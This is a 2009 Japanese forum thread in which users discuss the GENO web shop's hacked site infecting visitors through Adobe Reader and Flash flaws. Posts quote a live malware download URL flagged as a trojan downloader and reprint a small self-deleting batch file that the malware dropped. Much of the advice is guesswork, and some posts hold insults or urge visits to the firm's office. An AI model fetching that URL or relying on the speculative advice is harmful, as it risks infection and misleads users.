入れてから開いてくる

俺なんかIE6で止めてたのに
GENO見たらフリーズして再起動したらIE7にされてたぜ。
WU以外は使わないからどっちでもいいっていやいいんだけど。

Spybotだと検出できるかな？
普段からJavaScriptは切っておくのが安全なんだな

念の為、対応してるソフトでスキャンかけた方が良いぞ。

>>812
それなんだが、どうやら最初にラトビア鯖へアクセスしたUAとIPアドレスを紐付けて管理しているみたい。
なので同一IPでアクセスしている場合、その後どうUAを偽装しようが同じコードが返ってくる。
俺のIDがコロコロ変わっているのもその関係。
UA変えた後同じIPでアクセスしてないか？

>>827
やってみたけど、クッキーしか出なかったよ

avast導入
といってもなにをしたらいいかわからないわ

vistaだけど何を持って感染というのか分からんから
即イメージから復元したよ

短い間だが俺が気付いた事っつったら
ＨＤＤとＣＰＵが継続して使用状態になってた
ＨＰアクセス時にノートンに許可や遮断ログが色々書き込まれてた
ラトビアＩＰとの通信ログがあった

こんなもんだな、変なプログラムは見当たらなかったよ

原子力マークが出るまで待つだけ。

こないだここで買ったノーパソのアダプターにPSE入ってなかったんだけど、
要らなくなってヤフオクで売ったら俺捕まる？

まあ一ついえることは二度とgenoにアクセスすることは無いｗ

お前ら結構geno知ってるんだな

しかし、誰がしたのかも不明なのがな・・・・。

新聞やらアスキー流れの初心者は気付いてすらいない気ガス。

まだ直ってないとかクズにも程がある

>>834
罰金一億えん。
中古は除く。

>>830
�dクス
やっぱり対応したソフトを入れないとダメか

ゲノの鯖缶はやる気あるの？基地外なの？

サクセスみたいに夜逃げするんじゃ・・・

月曜日おおわらわだろうなw

もっと伸びてないとおかしいスレなのになんで★2なの？もっと問題に
なるべきだろこれ。それとも明日から急に加速すんのかな？

a-squaredで調べてみたら
\windows\umplyxoolに感染してた

>>845
これと言った被害が無いからだろ

>>845
Faithとか1’sだと軽く★20位逝ってたと思うｗ

>>817
もう警戒しない気になれないぜ・・・もう怪しいURL踏まない

糞古いノート使ってるんだが、ネットにつなぐと問題が起こったとかでるんだけど、何なのこれ
終了ですか？

PC一台しかない香具師は現在リカバリ中だろうから、明日辺りからが修羅場だな。

>>851
あ、そーいう奴も隠れて多いのかも知れないね。

>>850
投げ捨ててGenoで新しいの買えｗ

>>23
これらだったらどれを使っても今回のウイルスもチェック可能？

会社でやっちまったら困るよな
自宅マシンでまだよかったか？

やっぱブラウザは家にしろ火狐にしろオペラにしろUSBからポータブル系使うに限るな。

>>853
それがGenoの狙いでは…？
このウイルス騒ぎで知名度上げて

>>851
PC一台でも携帯から書き込むのでは？

ところで↓と同じ状態の奴いる？

536 名前： SM-3(茨城県)[sage] 投稿日：2009/04/05(日) 01:15:16.14 ID:0Dln3hZK
ルートにu.batってのが作られてたorz
中身は以下のとおり

:Z
DeL "K:\_.t"
IF EXIST "K:\_.t" GOTO Z
DeL "K:\u.bat"

こことは関係ないかもしれんが何かにやられたのか確実だorz

プニルで見事に爆死した漏れも火狐に乗り換えるかね。
イマイチなれんのよね。

>>846
なんて名前で引っかかるんだ？

>>857
信用は最悪だろｗ

>>854
カスペルスキーがおすすめ

狐でもjs有効だと駄目だぜ

>>855
会社のPCで踏んで食らったら普通に始末書レベルだよね。

例えショッピングサイトとはいえ、私用でWebで遊んでたのがバレバレだもの。
会社の備品購入ならもっとまともな店から買うはずだし。

こんな店で買うなんて書いたら稟議書通らないだろｗ

>>863
�d

漏れのCore2ノート届くのかねぇ・・・orz

>>861
ファイル名とフォルダ名はランダムだと思うから
名称を聞いても意味無いんじゃないのかな。
その中にEXEファイルとPDFファイルが居るかどうかが問題なのかと。

大半はブラウザ強制終了されておかしいな、と思うくらいな気がする
何か仕込まれていると気づいても、実害があるのかどうかわからんという
俺みたいなのも結構いるんじゃないかなぁ

変な実行ファイルは見あたらないし、バックドア仕込まれている様子もないから
とりあえず様子見するしかない

でも長期間サイト放置しているGENOは許せないな
もうここじゃ買い物できない

>>861
>>198

GENOを引きずり落とそうとするライバル業者の書き込みが目立つスレですね

>>871
>>871
>>871
>>871

>>869
なんかクラッキングされたスクリプトにはFlashの脆弱性を付いたのも書かれているみたいだけど、
結局Flash関連の現象が報告されないって事は
その前のPDFの処理だけでCPU負荷が上がりまくって落ちちゃうからなのかも知れないね。

>>871
Genoが勝手に落ちてっているだけ。もともと評判よくは無いのに…

カスペルスキー「Meですか・・・ごめんなさい」

　｡･ﾟ･(ﾉ∀`)･ﾟ･｡

>>869とか露骨
もう買わないとか、その手の書き込みはすべて業者

>>873
ウイルス作者のミスだなｗ

>>874
ジェノなのにGEOが有名なせいでゲノゲノ言われてなぁー

Geno社員が、個人情報満載の事務用PCで
「今日のうちのHPのネタはっと・・・」カチカチッ

おめでとうございます。おまいらの情報はめでたくﾂｺｳﾀされました。

だからよ、お前ら本当にウイルス仕込まれたの？

>>877
まさにウィルスミスだな

>>878
?

>>881
ほほう・・・

>>868
いや　だから聞きたいのは引っかかったウイルスの名前さ

>>829
なるほど、そういうことか。
ウィルスにやられた人の情報とかも収集してそうだな。

>>881だれうま

>>877
また昨夜の貴様か。

fack you

687 名前： ◆N9P3SuvBPo [sage] 投稿日：2009/04/05(日) 22:08:16
俺今な、そのgenoのトップやiframeで読み込まれるアンケートページ
問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ？

OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、
ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、
この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね？

誰でも良い、仮想PC持ってる人いたら検証してくれ！！

このウイルスでPCが壊れたりはしない？
今までと同じように使えるなら別に気にしないけど。

>>881
！！

>>889
普通に壊れるじゃん

>>881
おまい、才能あるな。

>>884
あ、そっちか。すまんな。

>>877
ウイル・スミス
なんちゃってーカクカクカクカクカク

コマンドプロンプト開こうとしても開けない・・・・
explorerが落ちる

>>881

やっぱインターネッツは恐ろしいぜHAHAHA!!

HAHAHA

カスペたんありが�d(´･ω･｀)

http://94.247.2.195/jquery.js Internet Explorer 遮断しました: Trojan-Downloader.JS.Agent.dwf

>>820
IEが暴走して固まる

>>873
確かにあっという間にメモリ食いまくって落ちたから実害なかったのかもしれんね

>>876
買うとか買わないとか書き込みすると、すぐに業者とかいわれるんだなｗ
ここじゃあまり買ったことはないけど、販売リスト眺めるのは好きだったよ

>>875
>>365

>>889
「利用する　便利じゃん」ですね。わかりま(´･ω･)ｽ

昨日開いたけど何も起こらなかったな。Readerも起動しなかったし、なんなだろ。

a-squaredで調べたら問題なかったんだが
今度はa-squaredのプロセスが常駐してウザい

>>880
昨日の夜感染した
IEが負荷かかって落ちる
AVGの更新ができない
アップデートもIEが固まってできない

最初メモリがいかれたかと思ったんだけど
復旧で直った
あとはあす調べてみる

>>895
同じ事なって、１日前に修復したらなおったけど、
この件がきっかけだったら・・・・。

>>806
旦那が脱税ババア氏ね

>>902
�d

>>895
システムの復旧で直る
ウイルスが消えたかどうかかわからないけどね

多分flashの方は9.0.115.0以前に存在する脆弱性をつくもの
9.0.124以上であれば問題ないと思われる

>>856
関係あんの？

>>907>>910　ありがとうございます

おまえらはやく本社に文句言いに行けよ
ここに地図のってっから後は頼むな
http://www.geno.co.jp/access/map.php

月曜まで放置だから２ｃｈとか見てない奴の被害がどんどん拡大するｗ
鬼畜企業だな〜ｗ

昨日、GENO見ててFirefoxが落ちるなぁと思ったが、感染してたのかな。
今日の昼も見てたんだが・・・。
ウイルスバスターで検索かけてるが、今のところ何にも出てこない。
感染した場合の判別方法がはっきりしてないから、どうしようもなくてただ見てるだけ。

>>916
カスペ入れてスキャンしろ

踏んでからクリーンインストールで余裕でした

＞＞916
だからVBじゃ検出されないって

>>887
oh...miss spell

[Fuck you]

そもそも有料ソフトで拾えないとかクソ過ぎる。

>>920
I understand.

>>908
Fuck you

>>921　禿同　　もう金原ってんのが馬鹿馬鹿しい

firefoxなら落ちなかった。

新作ウイルスってところがちょっと盛り上がってる原因だな　
あとはgenoの無責任放置っぷりか

キングソフトが対応したみたいだな

>>910
システムの復元で４／２にしたよ。ありがとー。

完全無料のキングソフトですら対応してるのにｗ
ちゃんねらー利用率高いから当たり前か？
http://www.kingsoft.jp/

なんだ、FlashとReaderを最新にしてれば感染しないじゃん。つまらん。

ノートン2007で勝てる相手なのか？それが知りたい。

XP SP3でIE6で見てフリーズ。
カスペでチェックしたけど何もでない。
しかし、踏んでしまっただけに気になる。

これって結局、目的はボットの作成だろ。
acrobatかflashの脆弱性をついてバックドアを
開けといて後から使うつもりなんじゃないの？

>>930
惨敗

>>931
前スレではスパムメール鯖がポートを突っついてきたなんてレスもあったんで、
恐らく放置しておくと踏み台とかそんな感じで使われちゃうんだと思う。

>>932
強敵じゃないか！

>>919
>>198にTrendMicroの文字があるけど、これじゃ駄目ってこと？
あと昨日の午前3時くらいにアクセスしたPCもあって、Avastが入ってたんだけど念のため検索中。

>>919も>>917も、はっきりと言ってくれてありがたい。
カスペルスキー入れてくる。。

仮想環境で踏んでくる　ノシ

>>936
http://pc11.2ch.net/test/read.cgi/pc/1237696091/564
http://pc11.2ch.net/test/read.cgi/pc/1237696091/576
あとここの>>122

>>627
もしかしてそのＨＰがgeno？
かあああああああああああああああああ
今日ＺＩＰスレで斧かアルカンのアドレスだったのに、そこのＨＰにぶっとばされたきがする
それから調子悪くて復元した・・・

Readerインストールしたままで放置してたから
同意すんの？あ？って画面が出ただけだった
残念！

>Norton セーフウェブでこのサイトの問題は見つかりませんでした。

本当か？先生

むしろカスペル社員の陰謀だろ
カスペル信者がこのスレには多すぎる

>>939
このｽﾚにも偽装あるから気をつけろよ

>>930
ノートン360は大丈夫だった。

いまだに対応してないソフトはもうゴミと言っていいなｗ

カスペならもう駆除できる？

ジェノってジェノサイドって意味だなきっと

解雇ＳＥの仕業か

今まで10年くらいなんとなくバスター買ってきたけど
もうカワネ。

>>914のアドレスも踏むとヤバイ？

ビスタ厨が勝利とか・・・信じられん

カスペルとバスターのオンラインスキャンと自前のノートン360で問題なかったんだけど
セーフってことでいいの？
VistaのWindowsUpdateは最新でAdobeReaderも9.1.0だったんだけど・・・

geno系は全部だめなはず.

いつになったらノートン・バスターは対応するんだよ
カスペに遅れるのはわかるがKINGに先越されるようではなー
Ｓソフト最新verでと過信した人がひっかかる。新型恐るべし。

フラッシュ最新で感染無し

>>952
もう一度、genoに繋いで確認すればいい

最新のウイルスですよ
本当に感染は無いのかな（・∀・）ﾆﾔﾆﾔ

なんだよ、復元で治っちゃうじゃんか。つまんねえの

>>956
二度と繋ぎたくないです

やはりクリーンインスコが精神衛生上一番良い。
めんどくさくて放置してたSSDに換える良いきっかけになったよ。

cmdが立ち上がらん苦なるな

>>173
誤検出じゃない
【注文0.1】Genoのサイトでウイルス感染…か？★２
http://tsushima.2ch.net/test/read.cgi/news/1238897231/
【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/
Avastは優秀だなノートンとか検出できてないのに

>>962は別の板に貼ろうとしてミスった

とりあえず、面白がっていろんなとこに広げてる奴とか・・・・。

気になってウイルススキャンしてみたら、
違うやつが出てきたでござる。

>>951
のちに「V作戦」として、語り継がれることになる

>>951
UACの本領発揮だろ？

VistaはUIが致命的に取っつきにくいだけで、
根幹部分の設計は間違ってない

vistaつえええ

明日朝GENOの動向に注目だな

そろそろ次スレを

鬱陶しさ全開のUACを評価することになるとはな
まさかVISTAの価値を認めさせるためのMSの陰謀なのか！？

じゃGENOはお詫びとしてウイルス食らった人全員にVista進呈すれば良いと思うよ

>>1
おいおいおい、なんでこのURLが紫色になってんだよ？

なんだ真面目にウイルスなのか
はよ対応せーや滓ﾍﾟﾛﾍﾟﾛｽｷｰ
ド田舎徳島とロシアのタッグじゃ無理か

サイト作ったITソリューションの動向も見たいな
点プレに入れておいてくれ

>>942
多くはカスペル社に報告された物が
他社製品の定義ファイルに反映される
更新頻度といい間違ってはいない

今まで最強無防備マンだったけど、久しぶりにavast入れたぜ
全スキャンなんて数年ぶりだ

janeで誤検出あっただけで検出ナシだぜ
やっぱり最強

土日の2日間放置ってのはGENO悪質だな

失う情報なんてないわー

>>974
徳島舐めんな

>>951
マイクロソフトの工作にだまされるなよ
情強である俺たちニュー速民はは一生XPで行く
それがチームだ

うめ

梅

>>980
良く整備されたバイパスを使って行く先は結局市街地ってバイパス使う意味無いよね

>>981
俺はWin7付きEeePCかAspire one出るになるまでXPで行くぜ

win7SP1が出てSSDが安くなったら乗り変える

次スレいる？

相変わらず94.247.2.195に繋ごうとするな
ルーターでこのIPをブロックしたら↓こうなったまま
ttp://www1.axfc.net/uploader/Img/so/42046.jpg

うめ

acrobatreader5.0は勝ち組？

>>987
いる

1000ならウィルス被害の生存者無し

ウィルスの名前もわからないし、Adobe製品の脆弱性を突くという以外
どういう振る舞いをするのかよくわからないし、各社アンチウィルスの
対応状況もよくわからんのだよね。
94.247.2.195に対する通信が発生する以外にどんな悪さをしてるんだろ。

今のところ対応済みなのはAvast!とカスペのみ？
キングも対応済み？
ノートン、バスターは×
他はどうなんだろうね？

1000なら御坂妹もう10万人ほどおかわり

　　　　　　　　*'``・* 。
　　　　　　　　|　人　　`*
　　　　　　　　|（＿_）　　`*。　　　梅〜♪
　　　　 　　,｡∩＿＿）　　*
　　　　　　+　（・∀・　）　*｡+ﾟ 　　
　　　　　　`*｡ ヽ、　 つ *ﾟ*
　　　　　　　`・+｡*・' ﾟ⊃ +ﾟ
　　　　　　　☆　　 ∪~ ｡*ﾟ
　 　　　　　　`・+｡*・ ﾟ

梅

まとめ↓であってるの？

1.最新ではないAcroBatReaderのバージョン8がインスコされているとPC内にPDFがわんさか増殖してHDDを食いつぶす。
2.その際にCPU負荷がとんでもない状況になってブラウザが落ちたり操作不能でリセットボタンを「ぽちっとな」する羽目に。
3.OS再起動するとブルースクリーンになり再インスコする羽目に。

1000ならGENO終了

ν速公認ベンチマークブログ
いつでもレタス
http://azcji.cocolog-nifty.com/blog/cat1459704/index.html

1000ならGENO狩猟

このスレッドは１０００を超えました。
もう書けないので、新しい職を探して下さい。。。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　ニュース速報
　　　　　　　　　　　　　　http://www.hellowork.go.jp/